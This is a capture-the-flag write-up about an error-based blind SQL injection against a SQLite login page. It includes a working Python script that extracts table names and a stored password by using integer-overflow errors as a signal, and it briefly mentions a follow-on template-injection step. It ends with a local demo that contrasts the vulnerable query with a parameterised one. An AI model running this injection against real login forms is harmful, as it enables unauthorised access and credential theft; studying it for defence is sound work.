[Web] PYER xp0int Posted on Apr 29 2021

Testing with if() shows the backend is not MySQL; ifnull() working shows it is SQLite. A SQL error makes the server return HTTP 500, so this is error-based blind injection: a correct character guess is turned into an integer-overflow error (abs() of the minimum 64-bit integer), while a wrong guess simply completes the query.

```python
import requests

url = 'http://124.70.199.12:31534/login'

# Queries used step by step; the last assignment is the one that runs.
sql = "select name from sqlite_master where type='table' and name!='comment' and name!='users'"
sql = "select sql from sqlite_master where name='users' "
sql = "select username from users"
sql = "select password from users"
# result: sqlite_not_safe
# sql = "select sql from sqlite_master where name='comment' "
# sql = "select group_concat(password) from users "

# nullif(1, <char matches>) is NULL only when the guess is right; ifnull then yields
# 0x8000000000000000 (INT64_MIN) and abs() raises "integer overflow", i.e. a 500.
payload = "a' or abs(ifnull(nullif(1, unicode(substr(( {}),{},1))={}),0x8000000000000000)) or '0"
h = ''
for i in range(1, 10000):            # character position
    for j in range(30, 129):         # printable code points
        t = payload.format(sql, str(i), str(j))
        print(t)
        r = requests.post(url, data={
            'username': t,
            'password': 'a',
        })
        if r.status_code == 500:     # error means this character matched
            h += chr(j)
            print(h)
            break
    else:
        break                        # no character matched: end of the string
```

The password is sqlite_not_safe. Log in with it. After that there is another SQL injection; {{}} triggers SSTI, so just union select the SSTI payload.
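As an added example that is not part of the writeup, the following reproduces the oracle locally in Python's sqlite3 and places the vulnerable login query beside a parameterised one. The users table, the admin row, and the function names are constructed for the demo; the injected string is the writeup's own payload.

```python
import sqlite3

# Constructed schema; the password is the one recovered in the writeup.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'sqlite_not_safe')")
    return conn

def vulnerable_login(conn, username, password):
    # User input is pasted into the SQL text, so it can change the query.
    q = ("SELECT username FROM users WHERE username = '{}' "
         "AND password = '{}'").format(username, password)
    return conn.execute(q).fetchone() is not None

def safe_login(conn, username, password):
    # Bound parameters: the input is only ever a value, never SQL.
    q = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(q, (username, password)).fetchone() is not None

# The writeup's payload: a matching character makes nullif() NULL, ifnull()
# supplies INT64_MIN, and abs(INT64_MIN) raises SQLite's "integer overflow".
PAYLOAD = ("a' or abs(ifnull(nullif(1, unicode(substr(({}),{},1))={}),"
           "0x8000000000000000)) or '0")
SQL = "select password from users"

def probe(login, conn, pos, code):
    """Outcome of one guess: 'error' (the 500 oracle), 'login' or 'denied'."""
    try:
        ok = login(conn, PAYLOAD.format(SQL, pos, code), "a")
    except sqlite3.Error:
        return "error"
    return "login" if ok else "denied"

if __name__ == "__main__":
    db = make_db()
    for fn in (vulnerable_login, safe_login):
        print(fn.__name__, "right guess:", probe(fn, db, 1, ord("s")),
              "wrong guess:", probe(fn, db, 1, ord("t")))
```

With the vulnerable query a correct guess errors and a wrong one bypasses the login outright; with bound parameters both are simply denied.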